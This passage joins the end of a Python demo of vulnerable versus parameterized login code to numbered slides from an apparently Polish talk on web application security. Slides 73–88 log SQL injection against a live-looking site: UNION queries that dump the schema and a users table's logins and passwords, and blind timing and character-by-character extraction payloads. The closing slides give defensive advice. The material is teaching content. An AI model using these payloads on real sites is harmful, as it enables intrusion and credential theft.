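        "vuln_mysql_form": login_vulnerable(db, "admin", mysql_payload),
        "fixed_legit": login_fixed(db, "user", "asd12ed]r3"),
        "fixed_inject": login_fixed(db, "admin", payload),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The backend-specific detail (which comparison the database treats as true) is exactly why a character blacklist in the application is a weaker control than parameterization: the attacker adapts the payload to the database, while a bound parameter removes the mechanism rather than one payload.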
  • 73. POST http://www.server.tld/index.php?p=priv HTTP/1.1 priv_search=2e332424&cat='"1&w_city="'asd&submit=Szukaj M
  • 75. priv_search=&cat=1&w_city=Ca%B3a+Polska' and 1=0#&submit=Szukaj M
  • 76. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select @@version#&submit=Szukaj The used SELECT statements have a different number of columns M
  • 77. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version#&submi t=Szukaj M
  • 78. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18#&submi t=Szukaj M
  • 79. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,TABLE_SCHEMA,5,6,7,8,9,10,TABLE_NAME,12,COLUMN_NAME,14,15,16,17,18 from information_schema.columns where TABLE_SCHEMA != 'mysql' and TABLE_SCHEMA != 'information_schema'#&submit=Szukaj M
  • 80. priv_search=&cat=1&w_city=Ca%B3a+Polska' union all select 1,2,3,login,5,6,7,8,9,10,pass,12,sex,14,15,16,17,18 from users#&submit=Szukaj M
  • 81. Some S E C R E T S slip out ;-) 14831 users already registered (yeah, right ;-) M
  • 82. Another discovery:  There is 1836 bots :-) M
  • 83. Blind SQL Injection: registration form ' B
  • 84. Blind SQL Injection (experimenting): 1' and 1='0 → OK; 1' or 1='1 → This email is already registered. You need to pick another one; 1' union all SELECT IF(user() like '%sig%', BENCHMARK(3000000,MD5('x')),NULL)# → delay → user() == sig@...; 1' union all SELECT IF(user() like '%asd%', BENCHMARK(3000000,MD5('x')),NULL)# → no delay B
  • 85. Products 1-8 of 8 B
  • 86. Product database for selected category is empty B
  • 87. Blind SQL Injection /zgoda.php?id=155765%20AND%20(select%20ascii(substring((select%20login%20from%20admini%20limit%201,1),1,1)))%3D97 i.e. id=155765 AND (select ascii(substring((select login from admini limit ROW,1), POSITION, 1))) = ASCII_CODE B
  • 88. Results of a successful blind SQL Injection attack: delay; different content; error message B
  • 89. What can we do? Filter and sanitise input data - character white-listing - consistency (IDS, firewall, application, database). Do not trust user-side filters (selection lists, JavaScript, etc) M
  • 91. Web application security is bad Vulnerability-causing mistakes are everywhere* *well, almost everywhere ;-) M
  • 92. What to do? Be sure to properly sanitise data coming from and being sent to the user. Web Application Firewall (WAF), IDS. White-listing! M
  • 93. Be aware of potential threats. Listen and ask; use professional assistance; perform a cost-benefit analysis. Every piece of feedback is worth listening to M
  • 94. Use proven solutions • Traditional coding errors got answered by managed code, automatic typing, GC, etc. • Web frameworks help maintain code quality in Web Applications – Assure code quality to some degree – We are not 100% safe » Frameworks are not mature enough » Not everyone knows how to use them properly » Sometimes expanded in a dumb way » Wide exploitation due to mass usage M
  • 95. Hardening Proper configuration is a key! One application server configuration directive may prevent a vulnerability from being exploited PHP: http://www.sans.org/top20/#s1 M
  • 96. Think! No technical control will protect you from logical errors M